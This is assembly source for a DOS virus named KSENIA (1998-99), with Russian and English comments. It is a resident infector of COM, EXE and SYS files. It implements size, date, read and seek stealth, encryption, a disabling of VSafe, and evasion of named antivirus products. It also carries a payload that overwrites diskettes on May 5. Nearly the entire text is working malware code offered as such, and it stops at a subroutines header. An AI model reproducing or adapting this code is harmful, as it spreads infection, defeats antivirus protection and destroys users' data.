 comment ^

              KSENIA Virus Copyright (C) 1998-99 Deadman
            └────────────────────────────────────────────┘
        Pre-release Version (0.99 alpha). E-Mail: dman@mail.ru

 TSR/COM/EXE/SYS non-overwriting infector
  Infects on 3Dh/43h/4Bh/56h/6Ch (Open/ChMOD/Exec/Rean/ExtOpen)
  Size stealth on 11h/12h/4Eh/4Fh (Find First/Next FCB/DTA)
  Redirection stealth on 3Fh/42h (Read/LSeek)
  Disinfects the host on 40h (Write)
  Date stealth on 5700h/5701h (Get/Set File time/date)
  Uses Low memory addresses
  Encrypted. Uses XOR/ADD/SUB/NOT/INC/DEC/ROR/ROL/NEG encryptors
  Creates random 16-bit decryption key (value)
  Encrypts the decryption routine via simple XOR
  Doesn't infect files with a current hour stamp
  Doesn't infect files beginning on
      FI (FindVirus)
      SC (McAfee Scan)
      VS (McAfee VShield/Microsoft VSafe)
      TB (ThunderByte shit)
      DR (Doctor Web)
      AV (AntiViral Toolkit Pro)
      F- (F-Protect)
      FP (F-Protect)
      CO (Command Interpreter)
  Disable stealth on running programs (through MCB Owner)
      PKZIP   ──┐
      RAR       │
      ARJ       ├ Archivers
      LHA       │
      ARC     ──┘
      DEFRAG  ──┐
      SPEEDISK  │
      CHKDSK    │
      BACKUP    ├ To avoid errors
      MSBACKUP  │
      SCANDISK  │
      NDD     ──┘
  Anti-AV routines (Heuristic/Encryption)
      DrWeb 3.24/4.00      - No detection
      AVP/AVPLite 3.0      - No detection
      F-Prot 3.03a         - No detection
      NAV 4.0 (Bloodhound) - No detection
      MSAV                 - No detection
      TbScan 7.04          - No detection, "T" flag set
       TbClean             - Can't emulate ;( ...
  Gets the original int 21h vector uses tunneling method
  Uses SPLICE technology, simple anti-bug trick on windows run
  On May, the 5-th virus will erase every diskette you will insert
  Novell Network shit, depends on system time

 ^

 vsize  equ     eov-ksenia      ; virus size
 msize  equ     eom-ksenia      ; memory needed for virus


        model   tiny
        codeseg
        .386                    ; e?x and dwords enabled :)
 ksenia:
        push    ax bx cx dx si di bp es ds

        cld                     ; take down VSafe
        xor     ax,ax           ; ax  FA01
        mov     ds,ax           ; dx  5945
        mov     ax,0fa01h       ; int 16
        mov     dx,05945h
        pushf                   ; avoid TBScan stealth flag (X)
        call    dword ptr ds:[58h]

        call    extra           ; calculate extra offset
        xor     dx,dx           ; dx=0
        mov     ax,1200h
        pushf
        call    dword ptr ds:[0bch]
        sub     al,0ffh         ; no analysise => al=ff
        sbb     dh,0            ; if yes => dh<>0

        cli                     ; disable interrupts
        mov     si,09h*4        ; si=int 09h vector
        mov     ax,0ffffh
        push    word ptr [si]   ; save offset on stack
        mov     [si],ax         ; break it
        sub     [si],ax         ; breaked?
        pop     word ptr [si]   ; restore offset
        sti
        sbb     dh,0            ; if not => dh<>0

        lea     di,kill_vir+bp  ; store dx+1 nop after kill_vir label
        push    cs              ;
        pop     es
        mov     cx,1
        add     cx,dx
        mov     al,90h
        rep     stosb

 kill_vir:
        nop
        call    crypt           ; decrypt virus in memory
 enc_start:
        cmp     word ptr cs:[original+bp],0ffffh ; started from SYS?
        jne     no_sys

        lea     si,original+bp+6 ; reset interrupt and
        mov     di,6             ; strategy offset
        push    cs cs
        pop     ds es
        movsw
        movsw

        mov     ax,0ba00h       ; move virus body into video memory
        mov     es,ax           ; at BA00:0000
        xor     di,di
        mov     si,bp
        mov     cx,msize
        rep     movsb

        pop     ds es bp di si dx cx bx ax ; restore registers
        push    0ba00h offset sys_return   ; return address
        jmp     word ptr cs:[8]            ; call original routine

 sys_return:
        push    ax bx cx dx si di bp es ds ; staying resident after the driver
                                           ; is installed
        xor     bp,bp                      ; extra offset = 0

        mov     ax,18ddh                   ; already installed?
        int     21h
        cmp     ax,303h                    ; if yes, so return to dos
        je      complete

        les     bx,dword ptr cs:req_head   ; request header
        mov     ax,word ptr es:[bx+0eh]    ; last byte after the driver
        cmp     ax,55000                   ; installation. Is there enough
        ja      complete                   ; memory to append?
        add     word ptr es:[bx+0eh],msize ; increase last byte value
        shr     ax,4                       ; getting new CS
        inc     ax
        add     ax,word ptr es:[bx+10h]
        mov     es,ax
        jmp     move_it

; ---- COM/EXE installation ---
 no_sys:
        mov     ax,18ddh
        int     21h
        cmp     ax,303h
        je      complete

        mov     ah,62h          ; psp address
        int     21h
        mov     cs:psp+bp,bx
        add     bx,10h          ; moving virus body over the infected program
        mov     es,bx

 move_it:
        xor     di,di
        mov     si,bp
        mov     cx,msize
        push    cs
        pop     ds
        pushf
        push    es offset zero_bp
        cli
        mov     bp,sp
        sub     bp,7
        mov     word ptr [bp],0a4f3h    ; rep movsb instruction
        mov     byte ptr [bp+2],0cfh    ; iret opcode
        push    ss bp
        retf

 zero_bp:
        sti
        push    cs
        pop     ds
        mov     resthost,0
        mov     ax,psp
        mov     seg0,ax
        mov     seg1,ax
        mov     seg2,ax
        mov     point,offset keyword

        call    cr21z                        ; int 21h vector search
        call    restorehost

        xor     ax,ax           ; ds=0
        mov     ds,ax           ; setting new int 09h vector
        mov     si,09h*4        ;
        lea     di,io9
        movsw
        movsw
        mov     word ptr [si-4],offset int9
        mov     word ptr [si-2],es

        cmp     word ptr cs:original,0ffffh
        je      complete

        mov     es,cs:psp
        mov     ah,4ah
        mov     bx,(msize+100h)/16+2
        int     21h

        mov     si,2ch         ; environment segment
        mov     ds,es:[si]
        xor     ax,ax
        xor     si,si

 get_host:
        cmp     word ptr [si],ax ; looking for the 0000h word
        je      got_host
        inc     si
        jmp     get_host
 got_host:
        lea     dx,[si+4]       ; dx -> infected program's name

        mov     ax,4b00h        ; executing program
        lea     bx,epb
        push    cs
        pop     es
        cli
        xor     si,si
        mov     ss,si
        mov     sp,600h+256
        int     21h
        cli
        xor     ax,ax
        mov     ss,ax
        mov     sp,600h+256
        sti

        mov     ax,cs:psp
        dec     ax
        mov     ds,ax
        xor     si,si
        mov     al,4dh
        xchg    al,byte ptr [si]
        mov     byte ptr [si+100h],al
        mov     word ptr [si+3],0fh
        mov     word ptr [si+103h],msize/16+2
        mov     word ptr [si+101h],8

        mov     ah,4dh          ; exit code in AL
        int     21h
        mov     ah,4ch          ; DOS program terminate
        int     21h


══════════════════════════════════════════════════════════════════════════════
 complete:
        pop     ds es           ; восстановить сегментные
        mov     ax,es           ; регистры и сохранить их значение в ax

        lea     si,original+bp            ; si-сохраненное начало хоста
        mov     cx,word ptr cs:[si]
        cmp     cx,'MZ'                   ; откуда стартовали?
        je      run_exe                   ; 'MZ' 'ZM' -> из ЕХЕшника
        cmp     cx,'ZM'                   ; 0ffffh -> из SYSа
        je      run_exe                   ; иначе из СОМа
        inc     cx
        jz      run_sys

        mov     di,0100h        ; стартовали из СОМа,
        movsw                   ; восстановить начало
        movsb

        pop     bp di si dx cx bx ax
        db      0ebh,1          ; джамп на 6890h
        mov     sp,6890h        ; а это-nop/push 0100
        db      0,1
        db      0ebh,1          ; джамп на C3h
        mov     al,0c3h         ; тобишЬ ret

 run_exe:
        add     ax,010h         ; восстанавливаем ЕХЕшник
        mov     dx,cs:[si+14h]  ; старое IP
        mov     cs:_ip+bp,dx
        mov     dx,cs:[si+16h]  ; старое CS
        add     dx,ax           ; + PSPSeg+10h
        mov     cs:_cs+bp,dx

        mov     dx,cs:[si+10h]  ; старое SP
        mov     cs:_sp+bp,dx
        add     ax,cs:[si+0eh]  ; старое SS
        mov     cs:_ss+bp,ax

        pop     bp di si dx cx bx ax

        cli
        db      0bch            ;
 _ss    dw      ?               ; cli
        mov     ss,sp           ; mov sp,ss_value
        db      0bch            ; mov ss,sp
 _sp    dw      ?               ; mov sp,sp_value
        sti                     ; sti

        db      0eah            ; far jump instruction
 _ip    dw      ?
 _cs    dw      ?

 run_sys:
        pop     bp di si dx cx bx ax
        retf

 pushall      macro
              pushf
              push    ax bx cx dx si di bp ds es
              endm

 popall       macro
              pop     es ds bp di si dx cx bx ax
              popf
              endm

 copyright    db      '[KSENIA]',0
              db      'Version 0.99 alpha',0
              db      'Copyright (C) ',??date,20h,??time,' by Deadman',0
              db      'The Global Project devoted to Ksenia Chizhova',0

 nmess        db      'External System Error #05. Connection refused.',0
 endnmess:

 wino32bit    db      ' /d:c',0dh

 stdisable    db      'PKZIP',0
              db      'RAR',0
              db      'ARJ',0
              db      'LHA',0
              db      'ARC',0
              db      'DEFRAG',0
              db      'SPEEDISK',0
              db      'CHKDSK',0
              db      'BACKUP',0
              db      'MSBACKUP',0
              db      'SCANDISK',0
              db      'NDD',0
              db      0ffh

 funcs        db      18h XOR 25h
              dw      tsrtest
              db      0eh XOR 25h
              dw      select
              db      3dh XOR 25h
              dw      infect
              db      43h XOR 25h
              dw      infect
              db      4bh XOR 25h
              dw      infect
              db      56h XOR 25h
              dw      infect
              db      6ch XOR 25h
              dw      extinfect

              db      11h XOR 25h
              dw      fcbstealth
              db      12h XOR 25h
              dw      fcbstealth
              db      4Eh XOR 25h
              dw      dtastealth
              db      4Fh XOR 25h
              dw      dtastealth
              db      00h XOR 25h
              dw      terminate
              db      31h XOR 25h
              dw      terminate
              db      4Ch XOR 25h
              dw      terminate
              db      32h XOR 25h
              dw      getdpb

              db      42h XOR 25h
              dw      seekstealth
              db      3fh XOR 25h
              dw      readstealth
              db      40h XOR 25h
              dw      writehandler
              db      57h XOR 25h
              dw      datestealth
 endf:

 original     db      0c3h,27 dup (0)

 epb     dw      0h      ;
         dw      80h     ;    Адрес коммандной строки
 seg0    dw      ?       ;
         dw      5ch     ;    Адрес первого FCB
 seg1    dw      ?       ;
         dw      6ch     ;    Адрес второго FCB
 seg2    dw      ?       ;

 keyword db      25h+80h,1Fh+80h,12h+80h,31h+80h,17h+80h,1Eh+80h
 copy           db '123 4 5 Deadman'
 endcopy:

 smb_pattern    db      10100111b
                db      10100100b
                db      11000111b
                db      10100001b
                db      10100111b
                db      00000000b
                db      00000000b
                db      01111110b
                db      10000001b
                db      01111110b
                db      00000000b
                db      00000000b
                db      00000000b
                db      00000000b

                db      11101001b
                db      10001001b
                db      11101101b
                db      10001011b
                db      11101001b
                db      00000000b
                db      00000000b
                db      01111110b
                db      10000001b
                db      01111110b
                db      00000000b
                db      00000000b
                db      00000000b
                db      00000000b

                db      11100110b
                db      01001001b
                db      01001111b
                db      01001001b
                db      11101001b
                db      00000000b
                db      00000000b
                db      01111110b
                db      10000001b
                db      01111110b
                db      00000000b
                db      00000000b
                db      00000000b
                db      00000000b

                db      00000000b
                db      00000000b
                db      00000000b
                db      00111100b
                db      01000010b
                db      10011001b
                db      10100001b
                db      10100001b
                db      10011001b
                db      01000010b
                db      00111100b
                db      00000000b
                db      00000000b
                db      00000000b

                db      00000000b
                db      00000000b
                db      11101001b
                db      10101001b
                db      10101001b
                db      10101001b
                db      11101001b
                db      11001111b
                db      10100001b
                db      10100001b
                db      10100001b
                db      11101110b
                db      00000000b
                db      00000000b


▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Обработчик прерывания 21
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 tsr:   pushf
        cmp     cs:resthost,0
        je      usual_work
        popf
        mov     cs:resthost,0
        push    bp ax si ds
        mov     bp,sp
        sub     word ptr [bp+8],2
        lds     si,dword ptr [bp+8]
        mov     ax,cs:keepword
        mov     [si],ax
        call    restorehost
        pop     ds si ax bp
        iret

 usual_work:
        push    ds si ax                ; сохранить регистры
        lds     si,dword ptr cs:io21    ; загрузить адрес
        mov     ax,word ptr cs:prev2    ; обработчика int 21h
        mov     word ptr [si],ax        ; и починить его
        pop     ax
        push    ax

        xchg    al,ah
        xor     al,25h
        xor     si,si           ; ищем в таблице номер
 findfunc:
        cmp     al,cs:funcs+si  ; функции, которая сейчас
        jne     wrongfunc       ; вызывается
        call    verifymcb       ; нашли - проверить mcb

        mov     ax,word ptr cs:funcs+si+1 ; взять смещение
 quit_manager:
        mov     word ptr cs:func_jump,ax
        pop     ax si ds                  ; обработчика для этой функции
        popf                              ; восстановить всякую лажу
        mov     cs:func_number,ax
        push    cs:func_jump              ; сослаться на обработчик
        ret

 wrongfunc:
        add     si,3            ; берем следующую функцию
        cmp     si,endf-funcs   ; из таблицы
        jb      findfunc        ; иссякла?
        lea     ax,exithandler
        jmp     quit_manager

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Infect a file
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 extinfect:
        pushad
        mov     dx,si
        jmp     realinfect

 infect:
        pushad

 realinfect:
        push    ds es           ; сохранить регистры

        cmp     ax,4b00h
        jne     no_novell_check
        call    novell          ; фак ап юзер

 no_novell_check:
        push    ds              ; сохранить eax,ds
        push    0               ; засунуть в ds туда 0
        pop     ds
        mov     si,24h*4
        mov     eax,[si]                    ; сохранить 24-й вектор
        mov     dword ptr cs:io24,eax       ; установить свой
        mov     word ptr [si],offset int24h ; очень робкий и
        mov     word ptr [si+2],cs          ; стеснительный
        pop     ds

        mov     cx,128          ; анализируем имя файла
        mov     di,dx           ; ищем у него конец
 get_end:
        mov     al,[di]
        inc     di
        or      al,al
        loopnz  get_end
        jz      got_end         ; импотент?

 huy:   jmp     noinf

 got_end:
        dec     di
        mov     al,[di]         ; взять байт из строки
        cmp     al,'.'          ; начало расширения?
        je      got_pixel
        cmp     al,'\'          ; начало каталога?
        je      huy
        cmp     al,':'          ; ID диска?
        je      huy
        cmp     di,dx           ; начало строки?
        ja      got_end
        jmp     huy

 got_pixel:
        mov     ax,[di+2]       ; взять два символа
        call    upreg           ; расширения и ПОДНЯТЬ их
        shl     eax,16
        mov     ax,[di]
        call    upreg
        cmp     eax,'SYS.'
        je      good_ext
        cmp     eax,'MOC.'
        je      good_ext
        cmp     eax,'EXE.'
        jne     huy

 good_ext:
        xchg    bp,ax
        call    filenamecheck   ; проверить файл
        jc      huy

        mov     ax,4300h        ; достать аттрибуты файла
        call    int21
        jc      huy

        mov     si,cx           ; сохранить их в si
        mov     ax,4301h        ; установить нормальные ones
        xor     cx,cx
        call    int21
        jc      huy

        push    si ds dx        ; сохранить указатель и атр

        mov     ax,3d02h        ; пытаться открыть файл
        call    int21           ; для чтения/записи
        jc      restoreattr

        xchg    ax,bx           ; положить hanlde в bx
        push    cs cs           ; ds и es показывают на нас
        pop     ds es
        call    handlecheck     ; проверить файл на предмет
        jc      forcedclose     ; недисковости

        call    seek2eof        ; слишком большой?
        cmp     dx,10           ; а то Divide Overflow
        jae     close           ; начнет выебываться
        call    seek2bof        ; оттянуть конец обратно

        call    inf?            ; проверить, был ли он инфи-
        jc      close           ; цирован вирусом

        mov     ah,3fh          ; считать первые 28 байт
        mov     cx,28           ; в ds:original
        lea     dx,original
        call    int21
        cmp     cx,ax           ; все прочиталось?
        jne     close
        lea     si,original     ; сделать в буфере копию
        lea     di,buffer
        mov     cx,28
        cld
        rep     movsb

        lea     si,original     ; no comments
        lea     di,buffer

        mov     ax,[si]         ; взять в ax первые 2 байта
        cmp     bp,'S.'
        je      infect_sys
        cmp     ax,'ZM'         ; так ли это?
        je      infect_exe
        cmp     ax,'MZ'
        je      infect_exe

        call    cominfect
        jmp     analyse
 infect_exe:
        call    exeinfect
        jmp     analyse
 infect_sys:
        call    sysinfect
 analyse:
        jc      close           ; хоста
        call    writevirus      ; записать вирус

 close: call    correctdate
 forcedclose:
        mov     ah,3eh          ; закрыть его - чтоб он здох
        call    int21

 restoreattr:
        pop     dx ds cx        ; восстановить аттрибуты
        mov     ax,4301h
        call    int21

 noinf: push    0               ; восстановить 24-й вектор
        pop     ds
        push    eax
        mov     eax,dword ptr cs:io24           ; вернуть старый вектор
        mov     dword ptr ds:[24h*4],eax        ; прерывания 24 на место
        pop     eax

        pop     es ds           ; восстановить регистры
        popad

        jmp     exithandler     ; уйти..

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Select disk
; Disk erasing on holidays
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 select:
        pusha
        cmp     dl,2            ; гибкого диска, если он устанавливается
        jae     not_floppy      ; текущим или затираем дискету

        mov     bp,dx
        mov     ah,2ah          ; опрос даты
        call    int21
        cmp     dx,0505h        ; 05.05.XXXX?
        mov     dx,bp
        jne     not_floppy

        inc     dl              ; узнаем, сколько секторов на диске
        mov     ah,36h
        call    int21
        inc     ax
        jz      not_floppy
        dec     ax

        mul     dx
        mov     cx,ax
        mov     dx,1            ; со второго сектора (чтоб всяко мониторо
        dec     cx              ; ни гугу)
        mov     ax,bp
        int     26h
        popf

 not_floppy:
        popa
        jmp     exithandler

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; fcb size/date stealth ── called by 11h/12h
; no extension check (see above)
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 fcbstealth:
        call    int21                   ; find file!
        pushall                         ; save all 16-bit registers (exc. SP)
        cmp     al,0FFh                 ; no more filez?
        jz      no_stealth              ; nothing to do!
        cmp     cs:stf,0                ; can we stealth?
        jnz     no_stealth              ; we can't stealth
        cmp     cs:drf,0                ; can we stealth?
        jnz     no_stealth              ; we can't stealth

        mov     ah,2Fh                  ; get current DTA address
        call    int21
        mov     al,0FFh                 ; al = FF
        cmp     es:[bx],al              ; FCB is extended?
        jne     no_ext                  ; not extended!
        add     bx,7                    ; else 7 extra bytes
 no_ext:
        lea     si,[bx+14h]             ; si points to file date
        lea     di,[bx+1Dh]             ; di points to file size
        call    sizst                   ; stealth real file size!
        jmp     no_stealth              ; show the false to user!

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; date stealth ── called by 57h
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 datestealth:
        or      al,al
        jnz     set_date
        call    int21
        call    hidestm
        jmp     ireturn

 set_date:
        call    int21
        call    correctdate
        jmp     ireturn

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; dta size/date stealth ── called by 4Eh/4Fh
; no extension check (infected.exe could be renamed to fuckup.fun)
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 dtastealth:
        call    int21                   ; find file!
        pushall                         ; save all 16-bit registers (exc. SP)
        jc      no_stealth              ; nothing to do?
        cmp     cs:stf,0                ; can we stealth?
        jnz     no_stealth              ; we can't stealth
        mov     ah,2Fh                  ; get current DTA address
        call    int21
        lea     si,[bx+18h]             ; si points to file date
        lea     di,[bx+1Ah]             ; di points to file size
        call    sizst                   ; stealth real file size!
 no_stealth:
        popall                          ; reset all 16-bit registers
        jmp     ireturn                 ; show the false to user!

; ----= SIZE STEALTH =----
 sizst: mov     dx,word ptr es:[si]     ; ax = filedate
        call    hidestm                 ; verify and hide stamp
        jnc     no_hide                 ; if no stamp set ;(
        mov     word ptr es:[si],dx     ; save it in DTA
        mov     dx,word ptr es:[di+2]   ; dx:ax = filesize
        mov     ax,word ptr es:[di]
        sub     ax,vsize
        sbb     dx,0
        jc      no_hide
        stosw
        xchg    ax,dx
        stosw
 no_hide:
        ret

; ----= DATE CORRECT =----
 correctdate:
        mov     ax,5700h                ; dos function: get file time/date
        call    int21
        call    hidestm                 ; reset file date stamp
        call    inf?                    ; file is already infected?
        jnc     perfectly
        ror     dh,1
        add     dh,100
        rol     dh,1
 perfectly:
        mov     ax,5701h                ; set new, corrected file stamp
        call    int21
        ret

; ----= HIDE STAMP =----
 hidestm:
        push    dx                      ; store dx on stack
        shr     dh,1                    ; get stamp in dh
        cmp     dh,100                  ; above 100?
        pop     dx                      ; reset dx
        jb      good_stm
        ror     dh,1                    ; prepare dx
        sub     dh,100                  ; hide real stamp
        rol     dh,1                    ; reset dx
        stc
        ret
 good_stm:
        clc
        ret





▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; allow/disable fcb stealth
; virus disables fcb stealth on get dpb (32h) to avoid chkdsk (or other shit)
; mistakes
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 terminate:
        mov     cs:drf,0
        jmp     runaway

 getdpb:
        mov     cs:drf,1
 runaway:
        jmp     exithandler

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; lseek stealth
; избегаем возможности попадания lseek'а на тело вируса
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 seekstealth:
        cmp     cs:stf ,0   ; всякие RAR'ы бегут?
        jnz     nostealth
        call    handlecheck         ; дисковый файл?
        jc      nostealth
        call    inf?                ; инфицирован?
        jnc     nostealth

        cmp     al,2                ; прикрываем жопу вируса?
        je      hide_eof

        call    int21
        jc      st_ret

        call    seeksave
        call    seekhide
        mov     ax,cs:seek_pos
        mov     dx,cs:seek_pos+2
        clc
 st_ret:
        jmp     ireturn

 hide_eof:
        sub     dx,vsize
        sbb     cx,0

 nostealth:
        jmp     exithandler


▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; read stealth
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 readstealth:
        cmp     cs:stf ,0       ; всякие RAR'ы бегут?
        jnz     nostealth
        call    handlecheck         ; дисковый файл?
        jc      nostealth
        call    inf?                ; инфицирован?
        jnc     nostealth

        call    int21               ; читаем че просят
        jc      st_ret
        pushf                       ; сохранить регистры
        pusha
        mov     bp,dx               ; адрес буфера куда читать
        mov     cs:nrbytes,ax       ; количество прочитанных байт

        cmp     dword ptr cs:seek_pos,28    ; читают заголовок?
        jae     virsubtract
        call    load_original       ; выдрать оригинальное начало этого файла

        lea     si,buffer           ; смещение начала замещаемых байт
        add     si,cs:seek_pos

        mov     cx,cs:nrbytes       ; считаем количество байт которые нам нужно
        add     cx,cs:seek_pos      ; состелсить
        cmp     cx,28
        jbe     overwrite
        mov     cx,28
        sub     cx,cs:seek_pos

 overwrite:
        mov     al,cs:[si]          ; переносим заголовок
        mov     ds:[bp],al
        inc     si
        inc     bp
        loop    overwrite

 virsubtract:
        call    seeksave        ; заполняем переменую "seek_pos" текущим
        call    seekhide        ; значением положения lseek'а и стелсим
        popa                    ; приращение длины файла
        popf
        mov     ax,cs:nrbytes   ; прочитал ax байт...
        jmp     ireturn

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; лечим вирусоносителя (когда в него че-нибудь записывают)
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 writehandler:
        cmp     cs:stf ,0   ; всякие RAR'ы бегут?
        jne     nowrite
        call    handlecheck         ; дисковый файл?
        jc      nowrite
        call    inf?                ; инфицирован?
        jnc     nowrite

        call    seeksave            ; сохраняем указатель записи

        pusha                       ; извратимся на регистрами
        push    ds cs
        pop     ds

        call    load_original       ; оригинальное начало -> в буфер
        call    seek2bof            ; указатель -> в начало файла
        mov     ah,40h              ; пишем оригинальное начало файла
        mov     cx,28               ; 28 байт из буфера
        lea     dx,buffer
        call    int21
        jc      disfail             ; ошибка? ну тогда при записи того,
        xor     cx,ax               ; чего просят ошибка будет тоже!
        jnz     disfail

        mov     cx,-1               ; двигаемся к началу тела вируса
        mov     dx,-vsize           ; или концу зараженной программы
        call    seekfrom_eof
        mov     ah,40h              ; кастрируем файл (удаляем тело вируса
        xor     cx,cx               ; из вирусоносителя
        call    int21
        mov     ah,68h              ; пишем все данные на диск
        call    int21
 disfail:
        call    restoreseek         ; восстанавливаем lseek
        pop     ds                  ; восстанавливаем регистры
        popa
 nowrite:
        jmp     exithandler         ; выходим

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Ah=18h,AL=0DDh: TSR test
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 tsrtest:
        cmp     al,0ddh
        jne     tsrexit
        mov     ax,0303h
        jmp     ireturn

 tsrexit:
        jmp     exithandler

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; ════════════════════════> S·U·B·R·O·U·T·I·N·E·S <═════════════════════════
